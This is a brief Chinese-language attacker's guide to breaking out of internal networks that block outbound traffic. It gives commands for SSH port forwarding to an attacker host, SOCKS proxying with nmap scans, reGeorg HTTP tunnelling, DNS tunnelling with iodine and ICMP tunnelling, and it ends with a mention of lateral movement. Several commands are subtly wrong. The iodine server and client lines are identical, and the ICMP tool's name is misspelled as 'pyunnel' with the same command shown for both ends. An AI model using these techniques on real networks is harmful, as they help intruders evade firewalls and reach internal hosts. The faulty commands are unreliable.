内网不出网突破技巧-简述
基于隧道和代理的突破技巧
1.端口转发
1.1 本地端口转发
攻击者将目标主机的某些服务通过中间主机转发到攻击者的本地端口,从而像在本地访问这些服务一样。
例如:通过ssh端口转发访问目标内网中数据库服务器
ssh -L 3306:192.168.1.100:3306 user@middle_host
-L 本地端口转发,从本地访问远程服务
将目标主机的Mysql服务转发到攻击者的本地端口
1.2 远程端口转发
将目标主机流量反向转发到攻击者的主机。
ssh -R 8080:localhost:80 user@attack_host
-R 远程端口转发本地,将远程访问本地服务
2.代理隧道
代理隧道是通过已有的主机或服务绕过网络限制。常见代理隧道工具:
2.1 Socks代理
使用工具如proxychains,通过代理服务器将流量转发出去。
proxychains nmap -sT -Pn internal_host
2.2 Http代理
上传代理脚本到目标服务器,建立代理隧道。
常用工具:
reGeorg和Proxifier
3.DNS隧道
DNS隧道利用DNS请求在DNS查询中嵌入数据。实现外部通信。即使HTTP、HTTPS等流量被阻止,DNS流量同城不会被完全拦截。常见的DNS隧道工具:
iodine和dnscat2。
3.1使用iodine建立DNS隧道
在攻击主机上运行DNS服务器:
iodine -f -c -P password example.com
在目标主机上运行客户端:
iodine -f -c -P password example.com
4.ICMP隧道
ICMP隧道利用ICMP流量进行数据传输,绕过防火墙。在某些情况下,即使TCP/UDP流量被封锁,ICMP(如ping)可能仍然可以使用。常用工具:
Ptunnel和icmpsh
4.1使用Ptunnel建立ICMP隧道
在攻击机上运行Ptunnel:
pyunnel -p 80 -lp 22 -da 192.168.1.100 -dp 22
在目标机上运行客户端:
pyunnel -p 80 -lp 22 -da 192.168.1.100 -dp 22
5.内网横向移动
寻找其他可以出网的主机,通过控制其他服务器,横向访问目标服务器。